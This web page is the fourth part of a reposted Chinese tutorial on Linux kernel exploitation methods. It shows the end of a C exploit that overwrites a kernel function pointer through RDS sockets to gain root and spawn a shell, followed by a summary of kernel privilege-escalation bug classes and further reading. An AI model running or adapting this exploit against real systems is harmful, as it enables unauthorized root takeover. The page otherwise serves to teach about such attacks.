免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

当前位置: 主页 > 系统综合 > 各类编程 > Linux下内核漏洞利用几种方法(4)

Linux下内核漏洞利用几种方法(4)

时间:2012-04-01 22:46来源:未知 整理:寂涯网络 点击:


/* 覆盖函数ptrace_traceme地址值,使其指向commit_creds地址*/
printf("[*] Overwriting function pointer...\n");
write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
/*触发此payload并获取root权限后,恢复原函数地址*/
ioctl ( sendsock , 0, NULL );
printf("[*] Restoring function pointer...\n"); write_to_mem(target, rds_ioctl, sendsock, recvsock); printf("[*] Got root!\n");
execl("/bin/sh", "sh", NULL);
}
小结
最近几年关于Linux内核漏洞利用的研究关注更多,常见的内核提权漏洞大致为以下几 种即空指针引用,内核堆栈溢出,内核slab溢出,内核任意地址可写等等。本文只是简单了描述了空指针引用和内核任意地址写漏洞。至于内核slab内存溢出漏洞,读者感兴 趣可以参考sqrkkyu在Phrack #64上发表的文章“Attacking the Core : Kernel Exploiting Notes”及Enrico Perla出版的《A  Guide to Kernel Exploitation: Attacking the Core》 一书。

本页地址 http://www.jybase.net/biancheng/20120330813.html

百度搜索更多

谷歌搜索更多

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片
推荐内容
赞助商
赞助商


关于本站免责声明视频更新google百度地图视频地图RRS订阅

如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com